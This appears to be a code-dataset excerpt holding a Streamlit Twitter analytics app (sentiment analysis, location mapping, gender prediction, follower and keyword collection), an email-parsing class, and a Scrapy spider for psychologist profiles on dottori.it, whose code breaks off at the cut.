file_name.endswith('.json')]\r\n\r\n # Select files\r\n selected_files = st.multiselect(\"Select Files\", file_list, 
default=file_list[:4], key=\"file_selector\")\r\n\r\n # Define the number of columns based on the number of selected files\r\n num_columns = len(selected_files)\r\n\r\n # Create a grid layout with the specified number of columns\r\n columns = st.columns(num_columns)\r\n\r\n # Iterate over the selected files and display sentiment analysis results and charts\r\n for i, file_name in enumerate(selected_files):\r\n # List to store preprocessed text data from the current file\r\n preprocessed_text_data = []\r\n\r\n # File path of the current file\r\n file_path = os.path.join(folder_path, file_name)\r\n\r\n # Load and preprocess the text data from the file\r\n text_data = load_and_preprocess_data(file_path)\r\n\r\n # Append the preprocessed text data to the list\r\n preprocessed_text_data.extend(text_data)\r\n\r\n # Perform sentiment analysis on the preprocessed text data\r\n df_sentiment = perform_sentiment_analysis(preprocessed_text_data)\r\n\r\n # Calculate the sentiment distribution for the current file\r\n sentiment_distribution = df_sentiment.mean().drop(\"compound\")\r\n\r\n # Display the sentiment analysis results in the current column\r\n with columns[i]:\r\n st.subheader(f\"Sentiment Analysis: {file_name}\")\r\n st.dataframe(df_sentiment)\r\n\r\n # Plot the sentiment distribution as a pie chart\r\n fig, ax = plt.subplots()\r\n ax.pie(sentiment_distribution.values, labels=sentiment_distribution.index, autopct='%1.1f%%', startangle=90)\r\n ax.axis('equal')\r\n ax.set_title(f\"Sentiment Distribution: {file_name}\")\r\n\r\n # Display the chart\r\n st.pyplot(fig)\r\n\r\n\r\n################################# SENTIMENT ANALYSIS PER USER PER FILES ##############################\r\n def load_and_preprocess_data(file_path):\r\n with open(file_path, 'r') as f:\r\n data = json.load(f)\r\n\r\n # Preprocess the text (e.g., lowercase, tokenization, stopwords removal, etc.)\r\n preprocessed_text_data = []\r\n stop_words = set(stopwords.words('indonesian'))\r\n stemmer = StemmerFactory().create_stemmer()\r\n\r\n for tweet_data in data['data']:\r\n text = tweet_data['Text']\r\n user = tweet_data['User Name'] # Get the user name\r\n\r\n # Convert text to lowercase\r\n text = text.lower()\r\n\r\n # Tokenize the text\r\n tokens = word_tokenize(text)\r\n\r\n # Remove stopwords and perform stemming\r\n processed_tokens = [stemmer.stem(token) for token in tokens if token not in stop_words]\r\n\r\n # Append the processed tokens and the user to the preprocessed text data\r\n preprocessed_text_data.append((processed_tokens, user))\r\n\r\n # Return the preprocessed text data\r\n return preprocessed_text_data\r\n\r\n # Perform sentiment analysis per user\r\n def perform_sentiment_analysis_per_user(text_data):\r\n # Initialize the VADER sentiment intensity analyzer\r\n sia = SentimentIntensityAnalyzer()\r\n\r\n # Create a dictionary to store sentiment scores per user\r\n user_sentiment_scores = {}\r\n\r\n # Perform sentiment analysis on each text per user\r\n for text, user in text_data:\r\n sentiment_score = sia.polarity_scores(' '.join(text))\r\n\r\n # Add the sentiment score to the user's scores\r\n if user not in user_sentiment_scores:\r\n user_sentiment_scores[user] = {\r\n 'positive': [],\r\n 'negative': [],\r\n 'neutral': [],\r\n 'compound': []\r\n }\r\n\r\n user_sentiment_scores[user]['positive'].append(sentiment_score['pos'])\r\n user_sentiment_scores[user]['negative'].append(sentiment_score['neg'])\r\n user_sentiment_scores[user]['neutral'].append(sentiment_score['neu'])\r\n 
user_sentiment_scores[user]['compound'].append(sentiment_score['compound'])\r\n\r\n # Calculate the average sentiment scores per user\r\n user_sentiment_scores_avg = {}\r\n for user, scores in user_sentiment_scores.items():\r\n user_sentiment_scores_avg[user] = {\r\n 'positive': np.mean(scores['positive']),\r\n 'negative': np.mean(scores['negative']),\r\n 'neutral': np.mean(scores['neutral']),\r\n 'compound': np.mean(scores['compound'])\r\n }\r\n\r\n # Convert the sentiment scores to a DataFrame\r\n df_sentiment_per_user = pd.DataFrame.from_dict(user_sentiment_scores_avg, orient='index')\r\n\r\n # Return the DataFrame with sentiment scores per user\r\n return df_sentiment_per_user\r\n\r\n # Main Streamlit app\r\n st.title(\"Sentiment Analysis per user\")\r\n\r\n # Folder path containing the JSON files\r\n folder_path = \"twitkeys\"\r\n\r\n # Get the list of JSON files in the folder\r\n file_list = [file_name for file_name in os.listdir(folder_path) if file_name.endswith('.json')]\r\n\r\n # Select files\r\n selected_files = st.multiselect(\"Select Files\", file_list, default=file_list[:1], key=\"file_selector_sent\")\r\n\r\n # Iterate over the selected files\r\n for file_name in selected_files:\r\n # List to store preprocessed text data from the current file\r\n preprocessed_text_data = []\r\n\r\n # File path of the current file\r\n file_path = os.path.join(folder_path, file_name)\r\n\r\n # Load and preprocess the text data from the file\r\n text_data = load_and_preprocess_data(file_path)\r\n\r\n # Append the preprocessed text data to the list\r\n preprocessed_text_data.extend(text_data)\r\n\r\n # Perform sentiment analysis per user on the preprocessed text data\r\n df_sentiment_per_user = perform_sentiment_analysis_per_user(preprocessed_text_data)\r\n\r\n # Display the sentiment analysis results per user\r\n st.subheader(f\"Sentiment Analysis per User: {file_name}\")\r\n st.dataframe(df_sentiment_per_user)\r\n\r\n # Plot the sentiment scores per user as a bar chart\r\n ax = df_sentiment_per_user.plot(kind='bar', rot=0)\r\n plt.xlabel('User')\r\n plt.ylabel('Sentiment Score')\r\n plt.title(f\"Sentiment Analysis per User: {file_name}\")\r\n plt.xticks(rotation='vertical')\r\n plt.tight_layout()\r\n\r\n # Modify the text of user in the bar chart\r\n for p in ax.patches:\r\n ax.annotate(str(round(p.get_height(), 2)), (p.get_x() + p.get_width() / 2., p.get_height()),\r\n ha='center', va='center', xytext=(0, 5), textcoords='offset points', fontsize=5)\r\n\r\n st.pyplot(plt)\r\n \r\n\r\n######################### LOCATION ##############################\r\n\r\n \r\n import folium\r\n from streamlit_folium import folium_static, st_folium\r\n from geopy.geocoders import Nominatim\r\n from geopy.exc import GeocoderUnavailable\r\n import os\r\n \r\n \r\n # Create a geolocator object\r\n geolocator = Nominatim(user_agent='twitter_map_app')\r\n\r\n # Define a function to perform geocoding with caching\r\n @st.cache_data\r\n def geocode_location(location):\r\n try:\r\n location_data = geolocator.geocode(location, timeout=5) # Increase the timeout value as needed\r\n if location_data:\r\n return location_data.latitude, location_data.longitude\r\n except GeocoderUnavailable:\r\n st.warning(f\"Geocoding service is unavailable for location: {location}\")\r\n return None, None\r\n \r\n \r\n\r\n # Get the file paths of all JSON files in the \"twitkeys\" folder\r\n file_paths = glob.glob('twitkeys/*.json')\r\n\r\n # Sort the file paths by modification time (newest to oldest)\r\n 
file_paths.sort(key=os.path.getmtime, reverse=True)\r\n\r\n    # Select the newest file as the default\r\n    default_files = file_paths[:1]\r\n\r\n    # Allow users to select multiple files using a multiselect widget\r\n    selected_files = st.multiselect(\"Select JSON Files\", file_paths, default=default_files)\r\n\r\n    for file_path in selected_files:\r\n        file_name = os.path.splitext(os.path.basename(file_path))[0]  # Extract the filename without extension\r\n\r\n        # Define variables to store the min/max latitude and longitude\r\n        min_latitude = float('inf')\r\n        max_latitude = float('-inf')\r\n        min_longitude = float('inf')\r\n        max_longitude = float('-inf')\r\n\r\n        # Load the current file\r\n        with open(file_path, 'r') as f:\r\n            data = json.load(f)\r\n\r\n        user_data = data['data']\r\n\r\n        # Perform geocoding for each user location\r\n        for user in user_data:\r\n            location = user.get('User Location')\r\n            if location:\r\n                latitude, longitude = geocode_location(location)\r\n                user['Latitude'] = latitude\r\n                user['Longitude'] = longitude\r\n                time.sleep(1)  # Add a 1-second delay between requests\r\n\r\n                # Update the min/max latitude and longitude\r\n                if latitude is not None:\r\n                    min_latitude = min(min_latitude, latitude)\r\n                    max_latitude = max(max_latitude, latitude)\r\n                if longitude is not None:\r\n                    min_longitude = min(min_longitude, longitude)\r\n                    max_longitude = max(max_longitude, longitude)\r\n\r\n        # Calculate the center latitude and longitude\r\n        center_latitude = (min_latitude + max_latitude) / 2\r\n        center_longitude = (min_longitude + max_longitude) / 2\r\n\r\n        # Create a Folium map object\r\n        m = folium.Map(location=[center_latitude, center_longitude], zoom_start=2)\r\n\r\n        # Add markers to the map\r\n        for user in user_data:\r\n            latitude = user.get('Latitude')\r\n            longitude = user.get('Longitude')\r\n            user_name = user.get('User Name')\r\n\r\n            if latitude is not None and longitude is not None:\r\n                popup = f\"User: {user_name}\\nLocation: {user['User Location']}\"\r\n                folium.Marker([latitude, longitude], popup=popup, tooltip=user_name).add_to(m)\r\n\r\n        # Display the map for the current file\r\n        st.header(f\"User Map in The Conversation on {file_name}\")\r\n        st_folium(m, width=1500, height=600)\r\n\r\n#################################################################\r\n    from sklearn.model_selection import train_test_split\r\n    from sklearn.feature_extraction.text import CountVectorizer\r\n    from sklearn.preprocessing import LabelEncoder\r\n    from sklearn.metrics import classification_report\r\n    from sklearn.ensemble import GradientBoostingClassifier\r\n    import joblib\r\n    from sklearn.metrics import accuracy_score\r\n    import plotly.express as px\r\n\r\n    import numpy as np\r\n\r\n    st.title(\"Gender Prediction from Twitter Data\")\r\n    st.header(\"Predicted Gender\")\r\n\r\n    def preprocess_tweet(tweet, training_columns):\r\n        processed_tweet = {\r\n            'User Name': str(tweet[0]),\r\n            'User Description': str(tweet[1]).lower() if tweet[1] else '',\r\n            'Text': str(tweet[2]).lower(),\r\n        }\r\n\r\n        processed_tweet = {k: float(v) if isinstance(v, str) and v.isnumeric() else v for k, v in processed_tweet.items()}\r\n        processed_tweet = pd.DataFrame(processed_tweet, index=[0])\r\n\r\n        # Perform one-hot encoding on the categorical variables\r\n        processed_tweet_encoded = pd.get_dummies(processed_tweet)\r\n        processed_tweet_encoded = processed_tweet_encoded.reindex(columns=training_columns, fill_value=0)\r\n
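        # NOTE (editor): pd.get_dummies() on a single row only emits columns for the\r\n        # values present in that row, so the reindex() above realigns the row to the\r\n        # training-time dummy columns and fills every missing indicator with 0.\r\n        # A minimal sketch of the idea:\r\n        #   pd.get_dummies(pd.DataFrame({'c': ['a']}))          -> columns: ['c_a']\r\n        #   .reindex(columns=['c_a', 'c_b'], fill_value=0)      -> columns: ['c_a', 'c_b']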
\r\n        return processed_tweet_encoded.values.flatten()\r\n\r\n    def predict_gender(model, features, training_columns):\r\n        processed_tweet = preprocess_tweet(features, training_columns)\r\n        prediction = model.predict([processed_tweet])\r\n        return prediction[0]\r\n\r\n\r\n\r\n    dfout = pd.read_json('output1.json')\r\n\r\n    # Prepare the data\r\n    if 'Gender' in dfout.columns:\r\n        X = dfout.drop('Gender', axis=1)\r\n        y = dfout['Gender']\r\n    else:\r\n        X = dfout.copy()\r\n        st.write('Gender not in df.columns')\r\n        st.stop()  # without the label column the classifier below cannot be trained\r\n\r\n    # Perform one-hot encoding on the categorical variables in X\r\n    X_encoded = pd.get_dummies(X)\r\n\r\n    # Get the training columns from the X_encoded DataFrame\r\n    training_columns = X_encoded.columns\r\n\r\n    # Split the data into training and testing sets\r\n    X_train, X_test, y_train, y_test = train_test_split(X_encoded, y, test_size=0.2, random_state=42)\r\n\r\n    # Create a Gradient Boosting Classifier model\r\n    model = GradientBoostingClassifier()\r\n\r\n    # Fit the model to the training data\r\n    model.fit(X_train, y_train)\r\n\r\n    # Predict the gender for the test data\r\n    y_pred = model.predict(X_test)\r\n\r\n    # Evaluate the model's performance\r\n    accuracy = accuracy_score(y_test, y_pred)\r\n    st.write('Accuracy:', accuracy)\r\n\r\n    # Save the trained model to a file\r\n    joblib.dump(model, 'modelgend.pkl')\r\n\r\n    # Get the file paths of all JSON files in the \"twitkeys\" folder\r\n    file_paths = glob.glob('twitkeys/*.json')\r\n\r\n    # Sort the file paths by modification time (newest to oldest)\r\n    file_paths.sort(key=os.path.getmtime, reverse=True)\r\n\r\n    # Allow users to select multiple files using a multiselect widget\r\n    selected_files = st.multiselect(\"Select JSON Files\", file_paths, default=file_paths[:4], key='gensel')\r\n\r\n    data_list = []\r\n\r\n    # Define the number of columns based on the number of selected files\r\n    num_columns = len(selected_files)\r\n\r\n    # Create a grid layout with the specified number of columns\r\n    columns = st.columns(num_columns)\r\n\r\n    for i, file_path in enumerate(selected_files):\r\n        with open(file_path, 'r') as file:\r\n            json_data = json.load(file)\r\n            data_list.extend(json_data[\"data\"])\r\n\r\n        dfgend = pd.DataFrame(data_list)\r\n        # Drop irrelevant columns\r\n        columns_to_drop = [\"User Screen Name\", \"User Location\", \"Hashtags\", \"Source\", \"in_reply_to_name\", \"mentioned_users\",\r\n                           \"Tweet URL\", \"Created At\", \"Retweet Count\", \"Reply Count\", \"Mention Count\",\r\n                           \"Longitude\", \"Latitude\", \"Replies\", \"Retweeted Tweet\", \"Tweet ID\", \"Profile Image URL\"]\r\n        dfgend = dfgend.drop(columns_to_drop, axis=1)\r\n        dfgend['Gender'] = ''\r\n\r\n        dfgend = dfgend.drop_duplicates(subset='User Name')\r\n\r\n        # Load the trained model from disk\r\n        model = joblib.load('modelgend.pkl')\r\n\r\n        # Predict gender for each tweet; predict_gender() preprocesses internally\r\n        for index, tweet in dfgend.iterrows():\r\n            features = [tweet['User Name'], tweet['User Description'], tweet['Text']]\r\n            prediction = predict_gender(model, features, training_columns)\r\n            dfgend.at[index, 'Gender'] = prediction\r\n\r\n        # Group by gender to get gender distribution\r\n        gender_counts = dfgend.groupby('Gender').size().reset_index(name='Count')\r\n\r\n        # Create a 
pie chart for gender distribution in the corresponding column\r\n with columns[i]:\r\n fig = px.pie(gender_counts, values='Count', names='Gender', title='Gender Distribution - ' + file_path)\r\n st.plotly_chart(fig)\r\n\r\n\r\n \r\n\r\n##################################################################\r\nwith tab3:\r\n st.header(\"Data Mining\")\r\n container3=st.container()\r\n with container3:\r\n \r\n \r\n colta, coltb = st.columns([2, 2])\r\n with colta:\r\n \r\n with st.form(key=\"taccountform\"):\r\n accounts = st_tags(\r\n label='# Enter Account:',\r\n text='Press enter to add more',\r\n value=[],\r\n suggestions=[],\r\n maxtags=4,\r\n key='1')\r\n\r\n submit = st.form_submit_button(label=\"Submit\")\r\n if submit:\r\n for account in accounts:\r\n user = api.get_user(screen_name=account)\r\n name = user.name\r\n description = user.description\r\n\r\n\r\n # get the list of followers for the user\r\n followers = api.get_followers(screen_name=account)\r\n follower_list = [follower.screen_name for follower in followers]\r\n\r\n # get the list of users that the user follows\r\n following = api.get_friends(screen_name=account)\r\n following_list = [friend.screen_name for friend in following]\r\n\r\n # find friends that do not follow back\r\n not_followed_back = [friend for friend in following_list if friend not in follower_list]\r\n\r\n # find followers that have not been followed back\r\n not_following_back = [follower for follower in follower_list if follower not in following_list]\r\n\r\n # find friends that follow back\r\n followed_back = [friend for friend in following_list if friend in follower_list]\r\n\r\n # find followers that are also friends\r\n following_back = [follower for follower in follower_list if follower in following_list]\r\n\r\n\r\n # get the user's tweets\r\n tweets = api.user_timeline(screen_name=account, count=10, tweet_mode='extended')\r\n tweets_list = [tweet._json for tweet in tweets]\r\n\r\n # create a dictionary to store the user's information, tweets, friends, and followers\r\n user_data = {\r\n 'name': name,\r\n 'description': description,\r\n 'followers': follower_list,\r\n 'following': following_list,\r\n 'not_followed_back': not_followed_back,\r\n 'not_following_back': not_following_back,\r\n 'followed_back': followed_back,\r\n 'following_back': following_back,\r\n 'tweets': tweets_list\r\n }\r\n\r\n # Create a directory if it doesn't exist\r\n os.makedirs(\"twittl\", exist_ok=True)\r\n\r\n file_path = f\"twittl/{account}_data.json\"\r\n if os.path.exists(file_path):\r\n # Load existing data from the file\r\n with open(file_path, 'r') as json_file:\r\n existing_data = json.load(json_file)\r\n\r\n # Update the existing data with new data\r\n existing_data['name'] = name\r\n existing_data['description'] = description\r\n existing_data['followers'] = follower_list\r\n existing_data['following'] = following_list\r\n # Update other fields as needed\r\n\r\n # Write the updated data back to the file\r\n with open(file_path, 'w') as json_file:\r\n json.dump(existing_data, json_file)\r\n else:\r\n # Create a new file and write the data to it\r\n user_data = {\r\n 'name': name,\r\n 'description': description,\r\n 'followers': follower_list,\r\n 'following': following_list,\r\n 'tweets': tweets_list\r\n }\r\n # Add other fields as needed\r\n\r\n with open(file_path, 'w') as json_file:\r\n json.dump(user_data, json_file)\r\n\r\n \r\n with coltb:\r\n\r\n \r\n \r\n \r\n with st.form(key=\"tkeysform\"):\r\n # Add tag input for keywords\r\n keywords = st_tags(\r\n 
label='# Enter Keyword(s):',\r\n                    text='Press enter to add more',\r\n                    value=[],\r\n                    suggestions=[],\r\n                    maxtags=4,\r\n                    key='2'\r\n                )\r\n\r\n                # Add search button within the form\r\n                search_button = st.form_submit_button(label=\"Search\")\r\n                if search_button and keywords:\r\n                    for keyword in keywords:\r\n                        results = []\r\n\r\n                        # Perform search for each keyword\r\n                        tweets = client.search_recent_tweets(\r\n                            query=keyword,\r\n                            tweet_fields=[\r\n                                'context_annotations', 'text', 'created_at', 'entities', 'source', 'geo', 'public_metrics',\r\n                                'referenced_tweets'\r\n                            ],\r\n                            user_fields=['name', 'username', 'profile_image_url', 'description', 'location'],\r\n                            expansions=[\r\n                                'author_id', 'referenced_tweets.id', 'referenced_tweets.id.author_id',\r\n                                'in_reply_to_user_id', 'entities.mentions.username', 'geo.place_id'\r\n                            ],\r\n                            max_results=20\r\n                        )\r\n\r\n                        # Get users list from the includes object\r\n                        users = {u[\"id\"]: u for u in tweets.includes['users']}\r\n\r\n                        for tweet in tweets.data:\r\n                            # Initialize per-tweet variables\r\n                            place_name = ''\r\n                            in_reply_to_name = ''\r\n                            longitude = None\r\n                            latitude = None\r\n                            retweeted_tweet_info = None  # attached to tweet_data after it is built below\r\n\r\n                            user_id = tweet.author_id\r\n                            if user_id in users:\r\n                                user = users[user_id]\r\n                                user_name = user['name']\r\n                                user_screen_name = user['username']\r\n                                profile_image_url = user['profile_image_url']\r\n                                user_description = user['description']\r\n                                user_location = user.get('location', None)\r\n                                retweeted_user = None  # Initialize the variable\r\n\r\n                                # Extract retweet, mention, and reply information\r\n                                retweet_count = tweet.public_metrics['retweet_count']\r\n                                reply_count = tweet.public_metrics['reply_count']\r\n                                mention_count = 0\r\n\r\n                                mentioned_users = []\r\n\r\n                                if 'entities' in tweet and 'mentions' in tweet.entities:\r\n                                    mentions = tweet.entities['mentions']\r\n                                    mention_count = len(mentions)\r\n\r\n                                    for mention in mentions:\r\n                                        mentioned_user_screen_name = mention['username']\r\n\r\n                                        mentioned_users.append({\r\n                                            'User Screen Name': mentioned_user_screen_name\r\n                                        })\r\n\r\n                                replies = []\r\n\r\n                                # Calculate reply count\r\n                                if tweet.in_reply_to_user_id is not None:\r\n                                    reply_count += 1\r\n\r\n                                if 'referenced_tweets' in tweet:\r\n                                    referenced_tweets = tweet.referenced_tweets\r\n                                    for referenced_tweet in referenced_tweets:\r\n                                        if referenced_tweet['type'] == 'retweeted':\r\n                                            retweet_count += 1\r\n                                            retweeted_tweet_id = referenced_tweet['id']\r\n                                            try:\r\n                                                retweeted_tweet = client.get_tweet(id=retweeted_tweet_id,\r\n                                                                                   tweet_fields=['text', 'author_id'])\r\n                                                if retweeted_tweet:\r\n                                                    retweeted_tweet_data = retweeted_tweet.data\r\n                                                    retweeted_tweet_text = retweeted_tweet_data['text']\r\n                                                    retweeted_tweet_author_id = retweeted_tweet_data['author_id']\r\n\r\n                                                    # Get retweeted user's information\r\n                                                    if retweeted_tweet_author_id in users:\r\n                                                        retweeted_user = users[retweeted_tweet_author_id]\r\n                                                        retweeted_user_name = retweeted_user['name']\r\n                                                        retweeted_user_screen_name = retweeted_user['username']\r\n\r\n                                                        # Buffer the retweet information; tweet_data is only built later in this loop\r\n                                                        retweeted_tweet_info = {\r\n                                                            'Text': retweeted_tweet_text,\r\n                                                            'Author Name': retweeted_user_name,\r\n                                                            'Author Screen Name': retweeted_user_screen_name\r\n                                                        }\r\n                                            except Exception as e:\r\n                                                print(f\"Error retrieving retweeted tweet: {e}\")\r\n\r\n                                        elif referenced_tweet['type'] == 'replied_to':\r\n                                            replied_tweet_id = referenced_tweet['id']\r\n                                            try:\r\n                                                replied_tweet = client.get_tweet(id=replied_tweet_id, tweet_fields=['author_id'])\r\n                                                if replied_tweet:\r\n                                                    replied_user_id = replied_tweet.data['author_id']\r\n                                                    replied_user = 
users.get(replied_user_id, None)\r\n\r\n                                                    if replied_user:\r\n                                                        replied_user_screen_name = replied_user['username']\r\n                                                        replies.append({\r\n                                                            'User Screen Name': replied_user_screen_name\r\n                                                        })\r\n                                            except Exception as e:\r\n                                                print(f\"Error retrieving replied tweet: {e}\")\r\n\r\n                                # Get latitude and longitude from place_id\r\n                                if 'geo' in tweet and 'place_id' in tweet.geo:\r\n                                    place_id = tweet.geo['place_id']\r\n                                    try:\r\n                                        place = client.get_place(id=place_id, place_fields=['geo'])\r\n                                        if place and 'geo' in place:\r\n                                            latitude = place.geo['coordinates'][0]\r\n                                            longitude = place.geo['coordinates'][1]\r\n                                    except Exception as e:\r\n                                        print(f\"Error retrieving place information: {e}\")\r\n\r\n                                # Get like count and quote count\r\n                                like_count = tweet.public_metrics['like_count']\r\n                                quote_count = tweet.public_metrics['quote_count']\r\n\r\n                                if 'entities' in tweet and 'hashtags' in tweet.entities:\r\n                                    hashtags = [tag['tag'] for tag in tweet.entities['hashtags']]\r\n                                else:\r\n                                    hashtags = []\r\n\r\n                                full_text = tweet.text\r\n\r\n                                # Extract relevant fields from tweet and user\r\n                                tweet_data = {\r\n                                    'User Name': user_name,\r\n                                    'User Screen Name': user_screen_name,\r\n                                    'Profile Image URL': profile_image_url,\r\n                                    'User Description': user_description,\r\n                                    'User Location': user_location if user_location else None,\r\n                                    'Created At': tweet.created_at,\r\n                                    'Tweet ID': tweet.id,\r\n                                    'Text': full_text,\r\n                                    'Hashtags': hashtags,\r\n                                    'Tweet URL': f\"https://twitter.com/{user_screen_name}/status/{tweet.id}\",\r\n                                    'Source': tweet.source or '',\r\n                                    'Retweet Count': retweet_count,\r\n                                    'Reply Count': reply_count,\r\n                                    'Mention Count': mention_count,\r\n                                    'Longitude': longitude if longitude else None,\r\n                                    'Latitude': latitude if latitude else None,\r\n                                    'in_reply_to_name': in_reply_to_name if in_reply_to_name else None,\r\n                                    'mentioned_users': mentioned_users if mentioned_users else [],\r\n                                }\r\n\r\n                                # Add replies list to tweet_data\r\n                                tweet_data['Replies'] = replies if replies else []\r\n\r\n                                # Attach the buffered retweet information, if any\r\n                                if retweeted_tweet_info:\r\n                                    tweet_data['Retweeted Tweet'] = retweeted_tweet_info\r\n\r\n                                results.append(tweet_data)\r\n\r\n                        # Create a directory if it doesn't exist\r\n                        os.makedirs(\"twitkeys\", exist_ok=True)\r\n\r\n                        # Save the results in a JSON file named with the keyword\r\n                        file_path = os.path.join(\"twitkeys\", f\"{keyword}.json\")\r\n                        try:\r\n                            if os.path.exists(file_path):\r\n                                # Load existing data from the file\r\n                                with open(file_path, 'r') as json_file:\r\n                                    existing_data = json.load(json_file)\r\n\r\n                                # Append new data to the existing data\r\n                                existing_data['data'].extend(results)\r\n\r\n                                # Write the combined data back to the file\r\n                                with open(file_path, 'w') as json_file:\r\n                                    json.dump(existing_data, json_file, cls=DateTimeEncoder)\r\n                            else:\r\n                                # Create a new file and write the data to it\r\n                                output = {\"data\": results}\r\n                                with open(file_path, 'w') as json_file:\r\n                                    json.dump(output, json_file, cls=DateTimeEncoder)\r\n                        except Exception as e:\r\n                            print(f\"Error saving results to JSON file: {e}\")\r\n\r\n\r\n\r\n        colc, cold = st.columns([2, 2])\r\n        with colc:\r\n            container3a = st.container()\r\n            with container3a:\r\n\r\n                json_directory = \"twittl\"\r\n\r\n                # Get the list of JSON files in the directory\r\n                json_files = [file for file in os.listdir(json_directory) if file.endswith(\".json\")]\r\n\r\n                # Loop through each JSON file\r\n                for json_file in json_files:\r\n                    # Open the JSON file and load the data\r\n                    with open(os.path.join(json_directory, json_file), 'r') as f:\r\n                        user_data = json.load(f)\r\n\r\n                    # Extract the tweets from the user data\r\n                    
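# NOTE (editor): st.empty() is a single-slot placeholder, so each st.write()\r\n                    # issued inside the `with tweet_placeholder:` block below overwrites the\r\n                    # previous one; combined with time.sleep(0.2) this renders the tweets\r\n                    # as a ticker rather than a growing list.\r\n                    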
tweets_list = user_data['tweets']\r\n # user_name = tweet['user']['name']\r\n\r\n # Create a placeholder for the tweets\r\n tweet_placeholder = st.empty()\r\n with tweet_placeholder:\r\n # Display the tweets\r\n # st.subheader(f\"Tweets from {json_file[:-10]}\") # Remove the '_data.json' part from the filename\r\n for tweet in tweets_list:\r\n user_name = tweet['user']['name']\r\n full_text = tweet['full_text']\r\n \r\n # print (user_name)\r\n screen_name=tweet['user']['screen_name']\r\n # st.write(f\"{screen_name}\")\r\n tweet_content = f\"{user_name}: {full_text}\"\r\n st.write(tweet_content)\r\n # st.write(\"---\")\r\n time.sleep(0.2) # Add a delay between each tweet (adjust as needed)\r\n \r\n\r\n with cold:\r\n container3b=st.container()\r\n with container3b:\r\n\r\n def display_tweets(file_path):\r\n with open(file_path, 'r') as json_file:\r\n data = json.load(json_file)\r\n tweets = data['data']\r\n\r\n for tweet in tweets:\r\n user_name=tweet['User Name']\r\n created_at=tweet['Created At']\r\n text=tweet['Text']\r\n \r\n tweet_content = f\"{user_name}:{created_at}{text}\"\r\n st.write(tweet_content)\r\n # st.write(\"---\")\r\n time.sleep(0.2) # Add a delay between each tweet (adjust as needed)\r\n\r\n directory = \"twitkeys\"\r\n json_files = [file for file in os.listdir(directory) if file.endswith('.json')]\r\n\r\n for json_file in json_files:\r\n file_path = os.path.join(directory, json_file)\r\n # st.header(json_file[:-5])\r\n tweet_placeholder = st.empty()\r\n with tweet_placeholder:\r\n display_tweets(file_path)\r\n\r\n\r\n ","repo_name":"picstare/Fortext","sub_path":"pages/1_Twitter.py","file_name":"1_Twitter.py","file_ext":"py","file_size_in_byte":67868,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15985653997","text":"from typing import Any, Optional\n\nfrom easydata.parsers.text import Text\nfrom easydata.utils import email\n\n__all__ = (\"Email\",)\n\n\nclass Email(Text):\n def __init__(\n self,\n *args,\n domain: Optional[str] = None,\n **kwargs,\n ):\n\n self._domain = domain\n\n super().__init__(\n *args,\n **kwargs,\n )\n\n def parse_value(\n self,\n value: Any,\n data: Any,\n ):\n\n value = super().parse_value(value=value, data=data)\n\n if not value:\n return None\n\n if self._domain:\n email_value = email.search_one(value)\n\n # no need for adding a domain since it's already valid email\n if email_value:\n return email_value\n\n at_symbol = \"\" if value.endswith(\"@\") else \"@\"\n\n value = \"{}{}{}\".format(value, at_symbol, self._domain)\n\n return email.search_one(value)\n","repo_name":"easydatapy/easydata","sub_path":"easydata/parsers/email.py","file_name":"email.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"37"} +{"seq_id":"34245064714","text":"import json\r\nimport scrapy\r\nimport re\r\nimport csv\r\nimport os.path\r\nfrom scrapy_selenium import SeleniumRequest\r\n\r\n\r\nclass MiodottoreSpider(scrapy.Spider):\r\n name = 'dottori'\r\n title = 'dottori it'\r\n base_url = 'https://www.dottori.it'\r\n start_urls = [\r\n 'https://www.dottori.it/psicologo'\r\n ]\r\n count = 0\r\n count_links = 0\r\n\r\n @classmethod\r\n def clean_data(cls, data):\r\n if data and isinstance(data, str):\r\n data = data.encode('ascii', 'ignore').decode()\r\n return data\r\n\r\n @classmethod\r\n def get_index(cls, lst, index, default=''):\r\n \"\"\"\r\n return element on given index from list\r\n :param lst: list from which we 
will return element\r\n        :param index: index of element\r\n        :param default: return value if index out of range\r\n        :return:\r\n        \"\"\"\r\n        return cls.clean_data(lst[index]) if isinstance(lst, list) and len(lst) > index else default\r\n\r\n    def get_dict_value(self, data, key_list, default=''):\r\n        \"\"\"\r\n        gets a dictionary and a key_list, applies the keys sequentially on the dictionary and returns the value\r\n        :param data: dictionary\r\n        :param key_list: list of keys\r\n        :param default: return value if key not found\r\n        :return:\r\n        \"\"\"\r\n        for key in key_list:\r\n            if data and isinstance(data, dict):\r\n                data = data.get(key, default)\r\n            elif data and isinstance(data, list):\r\n                data = self.get_index(data, key) if isinstance(key, int) else default\r\n            else:\r\n                return default\r\n        return self.clean_data(data)\r\n\r\n    def parse(self, response):\r\n        profile_links = response.css(\".gtDoctorNameMedCen::attr(href)\").extract()\r\n        for each_link in profile_links:\r\n            yield response.follow(each_link, callback=self.parse_profile)\r\n        next_page = self.get_index(response.css(\".doc-page-item\"), -1).css(\"a::attr(href)\").extract_first()\r\n        if next_page is not None:\r\n            self.count_links = self.count_links + 1\r\n            print(self.count_links)\r\n            yield SeleniumRequest(url='{}{}'.format(self.base_url, next_page), callback=self.parse, wait_time=3)\r\n\r\n    def parse_profile(self, response):\r\n        if response.status != 200:\r\n            print(response.url)\r\n            return\r\n        item = dict()\r\n        item['sequential_id'] = self.count\r\n        item['global_id'] = None\r\n        item['source'] = 'https://www.dottori.it'\r\n        item['scrape_URL'] = response.url\r\n        item['is_therapist'] = None\r\n        item['title'] = response.css(\".doc-title-label::text\").extract_first()\r\n        item[\"name\"] = response.css('h1[itemprop=\"name\"]::text').extract_first()\r\n        item[\"is_verified\"] = bool(response.css(\".icon-check\"))\r\n        if response.css('a[href=\"#view-feedback\"]'):\r\n            item['review_number'] = self.get_index(\r\n                re.findall(\"[0-9]+\", response.css('a[href=\"#view-feedback\"]::text').extract_first()), 0)\r\n        else:\r\n            item['review_number'] = None\r\n        positive_review_number = 0\r\n        # year suffix -> [total reviews, positive reviews]\r\n        year_counts = {'21': [0, 0], '20': [0, 0], '19': [0, 0], '18': [0, 0]}\r\n        for each_review in response.css(\".doc-modal-body #view-feedback .doc-comments-grid .doc-bubble-comment\"):\r\n            if each_review.css(\".icon-like\"):\r\n                positive_review_number += 1\r\n            liked_date = each_review.css(\".mb-2 .doc-comment-head::text\").extract_first() or ''\r\n            unliked_date = each_review.css(\"header+p span::text\").extract_first() or ''\r\n            if each_review.css(\"header span+span.icon-like\"):\r\n                year = 